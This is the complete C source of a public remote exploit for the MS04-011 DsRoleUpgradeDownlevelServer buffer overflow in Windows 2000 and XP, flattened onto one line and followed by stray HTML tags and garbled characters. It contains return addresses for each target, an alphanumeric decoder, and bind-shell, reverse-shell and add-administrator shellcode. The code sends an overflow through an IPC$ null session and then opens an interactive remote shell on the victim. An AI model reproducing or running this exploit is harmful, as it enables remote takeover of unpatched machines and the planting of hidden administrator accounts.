/* * MS04-011 DsRoleUpgradeDownlevelServer Remote Exploit * * This program is free software; you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation; either version 2 of the License, or * (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program; if not, write to the Free Software * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA */ #include #include #pragma comment(lib, "ws2_32.lib") #pragma comment(lib, "mpr.lib") #define WIN2K 0 #define WINXP 1 struct target { char *desc; int os_type; int retaddr; }; /* * on Win2k we use a call edi in netrap.dll, * on WinXP we use a jmp esp in samsrv.dll. */ struct target tt[] = { { "Win2k en", WIN2K, 0x751c1152 }, { "Win2k fr", WIN2K, 0x75141152 }, { "WinXP en", WINXP, 0x7448f9cb }, { "WinXP fr", WINXP, 0x743ff9cb } }; int ttnum = 4; /* basic alpha shellcode decoder that passes through unicode api */ unsigned char shell_decode[] = { 0xeb, 0x23, 0x5e, 0x56, 0x5f, 0x81, 0xc7, 0x02, 0xd1, 0xff, 0xff, 0x57, 0x31, 0xd2, 0x4a, 0x4a, 0x4a, 0xac, 0x2c, 0x41, 0x50, 0x59, 0xac, 0x2c, 0x41, 0xc0, 0xe0, 0x04, 0x08, 0xc8, 0xaa, 0x39, 0x57, 0xfc, 0x75, 0xed, 0xc3, 0xe8, 0xd8, 0xff, 0xff, 0xff }; /* thanks to metasploit.org for their shellcodes */ /* -modified to call ExitThread, not ExitProcess */ /* note : end mark = 0xFFFFFFFD (must be unique) */ unsigned char win32_bind[] = { 0xe8, 0x38, 0x00, 0x00, 0x00, 0x43, 0x4d, 0x44, 0x00, 0xe7, 0x79, 0xc6, 0x79, 0xe5, 0x49, 0x86, 0x49, 0xa4, 0xad, 0x2e, 0xe9, 0xa4, 0x1a, 0x70, 0xc7, 0xd9, 0x09, 0xf5, 0xad, 0xcb, 0xed, 0xfc, 0x3b, 0x8e, 0x4e, 0x0e, 0xec, 0xef, 0xce, 0xe0, 0x60, 0xad, 0xd9, 0x05, 0xce, 0x72, 0xfe, 0xb3, 0x16, 0x57, 0x53, 0x32, 0x5f, 0x33, 0x32, 0x2e, 0x44, 0x4c, 0x4c, 0x00, 0x01, 0x5b, 0x54, 0x89, 0xe5, 0x89, 0x5d, 0x00, 0x6a, 0x30, 0x59, 0x64, 0x8b, 0x01, 0x8b, 0x40, 0x0c, 0x8b, 0x70, 0x1c, 0xad, 0x8b, 0x58, 0x08, 0xeb, 0x0c, 0x8d, 0x57, 0x2c, 0x51, 0x52, 0xff, 0xd0, 0x89, 0xc3, 0x59, 0xeb, 0x10, 0x6a, 0x08, 0x5e, 0x01, 0xee, 0x6a, 0x0a, 0x59, 0x8b, 0x7d, 0x00, 0x80, 0xf9, 0x06, 0x74, 0xe4, 0x51, 0x53, 0xff, 0x34, 0x8f, 0xe8, 0x90, 0x00, 0x00, 0x00, 0x59, 0x89, 0x04, 0x8e, 0xe2, 0xeb, 0x31, 0xff, 0x66, 0x81, 0xec, 0x90, 0x01, 0x54, 0x68, 0x01, 0x01, 0x00, 0x00, 0xff, 0x55, 0x20, 0x57, 0x57, 0x57, 0x57, 0x47, 0x57, 0x47, 0x57, 0xff, 0x55, 0x1c, 0x89, 0xc3, 0x31, 0xff, 0x57, 0x57, 0x68, 0x02, 0x00, 0x22, 0x11, 0x89, 0xe6, 0x6a, 0x10, 0x56, 0x53, 0xff, 0x55, 0x18, 0x57, 0x53, 0xff, 0x55, 0x14, 0x57, 0x56, 0x53, 0xff, 0x55, 0x10, 0x89, 0xc2, 0x66, 0x81, 0xec, 0x54, 0x00, 0x8d, 0x3c, 0x24, 0x31, 0xc0, 0x6a, 0x15, 0x59, 0xf3, 0xab, 0x89, 0xd7, 0xc6, 0x44, 0x24, 0x10, 0x44, 0xfe, 0x44, 0x24, 0x3d, 0x89, 0x7c, 0x24, 0x48, 0x89, 0x7c, 0x24, 0x4c, 0x89, 0x7c, 0x24, 0x50, 0x8d, 0x44, 0x24, 0x10, 0x54, 0x50, 0x51, 0x51, 0x51, 0x41, 0x51, 0x49, 0x51, 0x51, 0xff, 0x75, 0x00, 0x51, 0xff, 0x55, 0x30, 0x89, 0xe1, 0x68, 0xff, 0xff, 0xff, 0xff, 0xff, 0x31, 0xff, 0x55, 0x2c, 0x57, 0xff, 0x55, 0x0c, 0xff, 0x55, 0x28, 0x53, 0x55, 0x56, 0x57, 0x8b, 0x6c, 0x24, 0x18, 0x8b, 0x45, 0x3c, 0x8b, 0x54, 0x05, 0x78, 0x01, 0xea, 0x8b, 0x4a, 0x18, 0x8b, 0x5a, 0x20, 0x01, 0xeb, 0xe3, 0x32, 0x49, 0x8b, 0x34, 0x8b, 0x01, 0xee, 0x31, 0xff, 0xfc, 0x31, 0xc0, 0xac, 0x38, 0xe0, 0x74, 0x07, 0xc1, 0xcf, 0x0d, 0x01, 0xc7, 0xeb, 0xf2, 0x3b, 0x7c, 0x24, 0x14, 0x75, 0xe1, 0x8b, 0x5a, 0x24, 0x01, 0xeb, 0x66, 0x8b, 0x0c, 0x4b, 0x8b, 0x5a, 0x1c, 0x01, 0xeb, 0x8b, 0x04, 0x8b, 0x01, 0xe8, 0xeb, 0x02, 0x31, 0xc0, 0x89, 0xea, 0x5f, 0x5e, 0x5d, 0x5b, 0xc2, 0x08, 0x00, 0xfd, 0xff, 0xff, 0xff }; unsigned char win32_reverse[] = { 0xe8, 0x30, 0x00, 0x00, 0x00, 0x43, 0x4d, 0x44, 0x00, 0xe7, 0x79, 0xc6, 0x79, 0xec, 0xf9, 0xaa, 0x60, 0xd9, 0x09, 0xf5, 0xad, 0xcb, 0xed, 0xfc, 0x3b, 0x8e, 0x4e, 0x0e, 0xec, 0xef, 0xce, 0xe0, 0x60, 0xad, 0xd9, 0x05, 0xce, 0x72, 0xfe, 0xb3, 0x16, 0x57, 0x53, 0x32, 0x5f, 0x33, 0x32, 0x2e, 0x44, 0x4c, 0x4c, 0x00, 0x01, 0x5b, 0x54, 0x89, 0xe5, 0x89, 0x5d, 0x00, 0x6a, 0x30, 0x59, 0x64, 0x8b, 0x01, 0x8b, 0x40, 0x0c, 0x8b, 0x70, 0x1c, 0xad, 0x8b, 0x58, 0x08, 0xeb, 0x0c, 0x8d, 0x57, 0x24, 0x51, 0x52, 0xff, 0xd0, 0x89, 0xc3, 0x59, 0xeb, 0x10, 0x6a, 0x08, 0x5e, 0x01, 0xee, 0x6a, 0x08, 0x59, 0x8b, 0x7d, 0x00, 0x80, 0xf9, 0x04, 0x74, 0xe4, 0x51, 0x53, 0xff, 0x34, 0x8f, 0xe8, 0x83, 0x00, 0x00, 0x00, 0x59, 0x89, 0x04, 0x8e, 0xe2, 0xeb, 0x31, 0xff, 0x66, 0x81, 0xec, 0x90, 0x01, 0x54, 0x68, 0x01, 0x01, 0x00, 0x00, 0xff, 0x55, 0x18, 0x57, 0x57, 0x57, 0x57, 0x47, 0x57, 0x47, 0x57, 0xff, 0x55, 0x14, 0x89, 0xc3, 0x31, 0xff, 0x68, 0xc0, 0xa8, 0x00, 0xf7, 0x68, 0x02, 0x00, 0x22, 0x11, 0x89, 0xe1, 0x6a, 0x10, 0x51, 0x53, 0xff, 0x55, 0x10, 0x85, 0xc0, 0x75, 0x44, 0x8d, 0x3c, 0x24, 0x31, 0xc0, 0x6a, 0x15, 0x59, 0xf3, 0xab, 0xc6, 0x44, 0x24, 0x10, 0x44, 0xfe, 0x44, 0x24, 0x3d, 0x89, 0x5c, 0x24, 0x48, 0x89, 0x5c, 0x24, 0x4c, 0x89, 0x5c, 0x24, 0x50, 0x8d, 0x44, 0x24, 0x10, 0x54, 0x50, 0x51, 0x51, 0x51, 0x41, 0x51, 0x49, 0x51, 0x51, 0xff, 0x75, 0x00, 0x51, 0xff, 0x55, 0x28, 0x89, 0xe1, 0x68, 0xff, 0xff, 0xff, 0xff, 0xff, 0x31, 0xff, 0x55, 0x24, 0x57, 0xff, 0x55, 0x0c, 0xff, 0x55, 0x20, 0x53, 0x55, 0x56, 0x57, 0x8b, 0x6c, 0x24, 0x18, 0x8b, 0x45, 0x3c, 0x8b, 0x54, 0x05, 0x78, 0x01, 0xea, 0x8b, 0x4a, 0x18, 0x8b, 0x5a, 0x20, 0x01, 0xeb, 0xe3, 0x32, 0x49, 0x8b, 0x34, 0x8b, 0x01, 0xee, 0x31, 0xff, 0xfc, 0x31, 0xc0, 0xac, 0x38, 0xe0, 0x74, 0x07, 0xc1, 0xcf, 0x0d, 0x01, 0xc7, 0xeb, 0xf2, 0x3b, 0x7c, 0x24, 0x14, 0x75, 0xe1, 0x8b, 0x5a, 0x24, 0x01, 0xeb, 0x66, 0x8b, 0x0c, 0x4b, 0x8b, 0x5a, 0x1c, 0x01, 0xeb, 0x8b, 0x04, 0x8b, 0x01, 0xe8, 0xeb, 0x02, 0x31, 0xc0, 0x89, 0xea, 0x5f, 0x5e, 0x5d, 0x5b, 0xc2, 0x08, 0x00, 0xfd, 0xff, 0xff, 0xff }; unsigned char win32_adduser[] = { 0x66, 0x81, 0xec, 0x80, 0x00, 0x89, 0xe6, 0xe8, 0xb7, 0x00, 0x00, 0x00, 0x89, 0x06, 0x89, 0xc3, 0x53, 0x68, 0xef, 0xce, 0xe0, 0x60, 0xe8, 0xbd, 0x00, 0x00, 0x00, 0x89, 0x46, 0x0c, 0x53, 0x68, 0x8e, 0x4e, 0x0e, 0xec, 0xe8, 0xaf, 0x00, 0x00, 0x00, 0x89, 0x46, 0x08, 0x31, 0xdb, 0x53, 0x68, 0x70, 0x69, 0x33, 0x32, 0x68, 0x6e, 0x65, 0x74, 0x61, 0x54, 0xff, 0xd0, 0x89, 0x46, 0x04, 0x89, 0xc3, 0x53, 0x68, 0x5e, 0xdf, 0x7c, 0xcd, 0xe8, 0x8c, 0x00, 0x00, 0x00, 0x89, 0x46, 0x10, 0x53, 0x68, 0xd7, 0x3d, 0x0c, 0xc3, 0xe8, 0x7e, 0x00, 0x00, 0x00, 0x89, 0x46, 0x14, 0x31, 0xc0, 0x31, 0xdb, 0x43, 0x50, 0x68, 0x72, 0x00, 0x73, 0x00, 0x68, 0x74, 0x00, 0x6f, 0x00, 0x68, 0x72, 0x00, 0x61, 0x00, 0x68, 0x73, 0x00, 0x74, 0x00, 0x68, 0x6e, 0x00, 0x69, 0x00, 0x68, 0x6d, 0x00, 0x69, 0x00, 0x68, 0x41, 0x00, 0x64, 0x00, 0x89, 0x66, 0x1c, 0x50, 0x68, 0x58, 0x00, 0x00, 0x00, 0x89, 0xe1, 0x89, 0x4e, 0x18, 0x68, 0x00, 0x00, 0x5c, 0x00, 0x50, 0x53, 0x50, 0x50, 0x53, 0x50, 0x51, 0x51, 0x89, 0xe1, 0x50, 0x54, 0x51, 0x53, 0x50, 0xff, 0x56, 0x10, 0x8b, 0x4e, 0x18, 0x49, 0x49, 0x51, 0x89, 0xe1, 0x6a, 0x01, 0x51, 0x6a, 0x03, 0xff, 0x76, 0x1c, 0x6a, 0x00, 0xff, 0x56, 0x14, 0xff, 0x56, 0x0c, 0x56, 0x6a, 0x30, 0x59, 0x64, 0x8b, 0x01, 0x8b, 0x40, 0x0c, 0x8b, 0x70, 0x1c, 0xad, 0x8b, 0x40, 0x08, 0x5e, 0xc2, 0x04, 0x00, 0x53, 0x55, 0x56, 0x57, 0x8b, 0x6c, 0x24, 0x18, 0x8b, 0x45, 0x3c, 0x8b, 0x54, 0x05, 0x78, 0x01, 0xea, 0x8b, 0x4a, 0x18, 0x8b, 0x5a, 0x20, 0x01, 0xeb, 0xe3, 0x32, 0x49, 0x8b, 0x34, 0x8b, 0x01, 0xee, 0x31, 0xff, 0xfc, 0x31, 0xc0, 0xac, 0x38, 0xe0, 0x74, 0x07, 0xc1, 0xcf, 0x0d, 0x01, 0xc7, 0xeb, 0xf2, 0x3b, 0x7c, 0x24, 0x14, 0x75, 0xe1, 0x8b, 0x5a, 0x24, 0x01, 0xeb, 0x66, 0x8b, 0x0c, 0x4b, 0x8b, 0x5a, 0x1c, 0x01, 0xeb, 0x8b, 0x04, 0x8b, 0x01, 0xe8, 0xeb, 0x02, 0x31, 0xc0, 0x89, 0xea, 0x5f, 0x5e, 0x5d, 0x5b, 0xc2, 0x08, 0x00, 0xfd, 0xff, 0xff, 0xff }; char usage[] = " usage: progname \n" " [connect-back ip] [connect-back port]\n" "\n" "example: progname 0 2 192.168.1.10\n" " progname 1 2 192.168.1.10 192.168.1.4 4000\n" "\n" "available shellcode types:\n" "\n" "0 = bind a port on target\n" "1 = reverse connect (must specify ip/port)\n" "2 = create local admin (X/X)\n" "\n" "available targets:\n" "\n"; typedef int (_stdcall *LPFUNC)(); LPFUNC DsRoleUpgradeDownlevelServer; struct options { int sctype; int target; char *hostname; unsigned short port; } opt; int launch_sploit( char *buf_ovflow, char *buf_target ); int wait_for_shell( void ); int got_shell = 0; int main( int argc, char *argv[] ) { HINSTANCE hNETAPI32; NETRESOURCE netResource; OSVERSIONINFO osVer; char buf_tmp[4096]; char buf_target[512]; char buf_ovflow[8192]; unsigned char *p; int i, thread_id; printf( "\n" ); if( argc != 4 && argc != 6 ) { usage: printf( usage ); for( i = 0; i < ttnum; i++ ) printf( "%d : %s\n", i, tt[i].desc ); printf( "\n" ); return( 1 ); } sscanf( argv[1], "%d", &opt.sctype ); sscanf( argv[2], "%d", &opt.target ); opt.hostname = argv[3]; if( opt.sctype < 0 || opt.sctype > 2 ) goto usage; if( ( opt.sctype != 1 && argc != 4 ) || ( opt.sctype == 1 && argc != 6 ) ) goto usage; if( opt.target < 0 || opt.target >= ttnum ) goto usage; memset( buf_tmp, 0, sizeof( buf_tmp ) ); memset( buf_tmp, 'A', 2241 ); memcpy( buf_tmp + 512, shell_decode, sizeof( shell_decode ) ); p = (char *) ((int) buf_tmp + 512 + sizeof( shell_decode )); if( opt.sctype == 0 ) { srand( GetTickCount() ); opt.port = rand() % 32767 + 32768; win32_bind[166] = opt.port >> 8; win32_bind[167] = opt.port & 0xFF; for( i = 0; i < sizeof( win32_bind ); i++ ) { *p++ = 0x41 + ( win32_bind[i] & 0x0F ); *p++ = 0x41 + ( win32_bind[i] >> 4 ); } } if( opt.sctype == 1 ) { int p1, p2, p3, p4; p1 = p2 = p3 = p4 = 0; sscanf( argv[4], "%d.%d.%d.%d", &p1, &p2, &p3, &p4 ); win32_reverse[154] = p1 & 0xFF; win32_reverse[155] = p2 & 0xFF; win32_reverse[156] = p3 & 0xFF; win32_reverse[157] = p4 & 0xFF; sscanf( argv[5], "%hu", &opt.port ); win32_reverse[161] = opt.port >> 8; win32_reverse[162] = opt.port & 0xFF; for( i = 0; i < sizeof( win32_reverse ); i++ ) { *p++ = 0x41 + ( win32_reverse[i] & 0x0F ); *p++ = 0x41 + ( win32_reverse[i] >> 4 ); } } if( opt.sctype == 2 ) { for( i = 0; i < sizeof( win32_adduser ); i++ ) { *p++ = 0x41 + ( win32_adduser[i] & 0x0F ); *p++ = 0x41 + ( win32_adduser[i] >> 4 ); } } memset( buf_ovflow, 0, sizeof( buf_ovflow ) ); printf( " [+] Retaddr = 0x%08X (%s)\n", tt[opt.target].retaddr, tt[opt.target].desc ); if( tt[opt.target].os_type == WIN2K ) { int retaddr, len_eip, len_edi; retaddr = tt[opt.target].retaddr; len_eip = 2024; len_edi = 2104; buf_tmp[len_eip - 4] = (unsigned char) ( retaddr >> 0 ); buf_tmp[len_eip - 3] = (unsigned char) ( retaddr >> 8 ); buf_tmp[len_eip - 2] = (unsigned char) ( retaddr >> 16 ); buf_tmp[len_eip - 1] = (unsigned char) ( retaddr >> 24 ); buf_tmp[len_edi + 0] = (unsigned char) 0xE8; buf_tmp[len_edi + 1] = (unsigned char) 0xC3; buf_tmp[len_edi + 2] = (unsigned char) 0xF8; buf_tmp[len_edi + 3] = (unsigned char) 0xFF; buf_tmp[len_edi + 4] = (unsigned char) 0xFF; MultiByteToWideChar( CP_ACP, 0, buf_tmp, strlen( buf_tmp ), (unsigned short *) buf_ovflow, sizeof( buf_ovflow ) ); } if( tt[opt.target].os_type == WINXP ) { int retaddr, len_eip, len_esp; retaddr = tt[opt.target].retaddr; len_eip = 1968; len_esp = 1981; buf_tmp[len_eip - 4] = (unsigned char) ( retaddr >> 0 ); buf_tmp[len_eip - 3] = (unsigned char) ( retaddr >> 8 ); buf_tmp[len_eip - 2] = (unsigned char) ( retaddr >> 16 ); buf_tmp[len_eip - 1] = (unsigned char) ( retaddr >> 24 ); buf_tmp[len_esp + 0] = (unsigned char) 0xE8; buf_tmp[len_esp + 1] = (unsigned char) 0x3E; buf_tmp[len_esp + 2] = (unsigned char) 0xF9; buf_tmp[len_esp + 3] = (unsigned char) 0xFF; buf_tmp[len_esp + 4] = (unsigned char) 0xFF; memcpy( buf_ovflow, buf_tmp, strlen( buf_tmp ) ); } printf( " [+] Attempting to connect to \\ipc$\n" ); sprintf( buf_tmp, "\\\\%s\\ipc$", opt.hostname ); netResource.lpLocalName = NULL; netResource.lpProvider = NULL; netResource.dwType = RESOURCETYPE_ANY; netResource.lpRemoteName = buf_tmp; if( WNetAddConnection2( &netResource, "", "", 0 ) ) { printf( " [!] Create NULL session failed\n" ); //return( 1 ); } hNETAPI32 = LoadLibrary( "NETAPI32.dll" ); if( ! hNETAPI32 ) { printf( " [-] LoadLibrary(NETAPI32) failed\n" ); return( 1 ); } DsRoleUpgradeDownlevelServer = (LPFUNC) GetProcAddress( hNETAPI32, "DsRoleUpgradeDownlevelServer" ); if( ! DsRoleUpgradeDownlevelServer ) { printf( " [-] GetProcAddress(DsRole...) failed\n" ); return( 1 ); } printf( " [+] Patching DsRoleUpgradeDownlevelServer\n" ); if( ! VirtualProtect( DsRoleUpgradeDownlevelServer, 0x1000, PAGE_READWRITE, &i ) ) { printf( " [-] VirtualProtect(PAGE_READWRITE) failed\n" ); return( 1 ); } osVer.dwOSVersionInfoSize = sizeof( osVer ); if( ! GetVersionEx( &osVer ) ) { printf( " [-] GetVersionEx failed\n" ); return( 1 ); } if( osVer.dwMajorVersion != 5 || ( osVer.dwMinorVersion != WIN2K && osVer.dwMinorVersion != WINXP ) ) { printf( " [-] Run me on Win2k or WinXP\n" ); return( 1 ); } p = (unsigned char *) DsRoleUpgradeDownlevelServer; for( i = 0; i < 128; i++ ) { if( osVer.dwMinorVersion == WIN2K && p[0] == 0x6A && p[1] == 0x00 && p[2] == 0xE8 ) { p[0] = 0x90; p[1] = 0x52; break; } if( osVer.dwMinorVersion == WINXP && p[0] == 0x50 && p[1] == 0x56 && p[2] == 0xE8 ) { p[1] = 0x52; break; } p++; } if( i == 128 ) { printf( " [-] Could not patch DsRole(etc.)\n" ); return( 1 ); } memset( buf_target, 0, sizeof( buf_target ) ); MultiByteToWideChar( CP_ACP, 0, opt.hostname, strlen( opt.hostname ), (unsigned short *) buf_target, sizeof( buf_target ) ); if( ! CreateThread( NULL, 0, (LPTHREAD_START_ROUTINE) wait_for_shell, NULL, 0, &thread_id ) ) { printf( " [-] CreateThread failed\n" ); return( 1 ); } printf( " [+] Sending overflow buffer...\n" ); if( opt.sctype == 1 ) Sleep( 1500 ); launch_sploit( buf_ovflow, buf_target ); Sleep( 1500 ); TerminateThread( (HANDLE) thread_id, 0 ); if( ! got_shell && opt.sctype != 2 ) { printf( " [-] Shit happens, run me again ?\n" ); return( 1 ); } if( opt.sctype == 2 ) { printf( " [?] Sploit might have succeeded\n" ); return( 2 ); } return( 0 ); } int launch_sploit( char *buf_ovflow, char *buf_target ) { int err; char *buf_filler; buf_filler = "A\0A\0\0\0"; __asm { mov eax, buf_filler mov ecx, 11 pushargs: push eax loop pushargs mov ecx, buf_ovflow mov edx, buf_target push ecx call DsRoleUpgradeDownlevelServer mov err, eax } return( err ); } int wait_for_shell( void ) { WSADATA wsa; HANDLE _stdin; HANDLE _stdout; INPUT_RECORD rec; char buffer[4096]; int i, n, shell_fd; struct hostent *hostip; struct sockaddr_in shell_addr; if( WSAStartup( MAKEWORD( 1, 1 ), &wsa ) ) { printf( " [-] WSAStartup failed\n" ); return( 1 ); } if( opt.sctype == 0 ) { if( ( hostip = gethostbyname( opt.hostname ) ) == NULL ) { printf( " [-] gethostbyname(%s) failed\n", opt.hostname ); return( 1 ); } memcpy( (void *) &shell_addr.sin_addr, (void *) hostip->h_addr, 4 ); shell_addr.sin_family = AF_INET; shell_addr.sin_port = htons( opt.port ); shell_fd = SOCKET_ERROR; while( shell_fd == SOCKET_ERROR ) { shell_fd = socket( AF_INET, SOCK_STREAM, 0 ); if( shell_fd == SOCKET_ERROR ) { printf( " [-] socket() failed\n" ); return( 1 ); } if( connect( shell_fd, (const struct sockaddr *) &shell_addr, sizeof( struct sockaddr_in ) ) < 0 ) { closesocket( shell_fd ); shell_fd = SOCKET_ERROR; Sleep( 500 ); } } } if( opt.sctype == 1 ) { shell_fd = socket( AF_INET, SOCK_STREAM, 0 ); if( shell_fd == SOCKET_ERROR ) { printf( " [-] socket() failed\n\n" ); return( 1 ); } shell_addr.sin_family = AF_INET; shell_addr.sin_port = htons( opt.port ); shell_addr.sin_addr.s_addr = INADDR_ANY; if( bind( shell_fd, (struct sockaddr *) &shell_addr, sizeof( struct sockaddr_in ) ) < 0 ) { printf( " [-] bind() failed\n" ); return( 1 ); } if( listen( shell_fd, 5 ) < 0 ) { printf( " [-] listen() failed\n" ); return( 1 ); } i = sizeof( shell_addr ); n = accept( shell_fd, (struct sockaddr *) &shell_addr, &i ); if( n == SOCKET_ERROR ) { printf( " [-] accept() failed\n" ); return( 1 ); } closesocket( shell_fd ); shell_fd = n; } if( opt.sctype == 2 ) { return( 0 ); } got_shell = 1; _stdin = GetStdHandle( STD_INPUT_HANDLE ); _stdout = GetStdHandle( STD_OUTPUT_HANDLE ); SetConsoleMode( _stdin, ENABLE_LINE_INPUT | ENABLE_ECHO_INPUT | ENABLE_PROCESSED_INPUT ); printf( " [+] Connected to shell, enjoy.\n\n" ); Sleep( 1000 ); while( 1 ) { Sleep( 10 ); ioctlsocket( shell_fd, FIONREAD, &n ); if( n ) { n = recv( shell_fd, buffer, sizeof( buffer ), 0 ); if( n == 0 ) break; if( n == SOCKET_ERROR ) { printf( " [-] recv() failed\n" ); return( 1 ); } WriteConsole( _stdout, buffer, n, &i, NULL ); } PeekConsoleInput( _stdin, &rec, 1, &n ); if( n ) { if( rec.EventType != KEY_EVENT ) { ReadConsoleInput( _stdin, &rec, 1, &n ); continue; } ReadConsole( _stdin, buffer, sizeof( buffer ), &n, NULL ); if( send( shell_fd, buffer, n, 0 ) == SOCKET_ERROR ) { printf( " [-] send() failed\n" ); return( 1 ); } } } /* hasta luego... */ return( 0 ); }
<span id="7ztzv"></span>
<sub id="7ztzv"></sub>


<span id="7ztzv"></span><form id="7ztzv"></form>


<span id="7ztzv"></span>
    

      

        <address id="7ztzv"></address>
            

ÑÇÖÞÅ·ÃÀÔÚÏß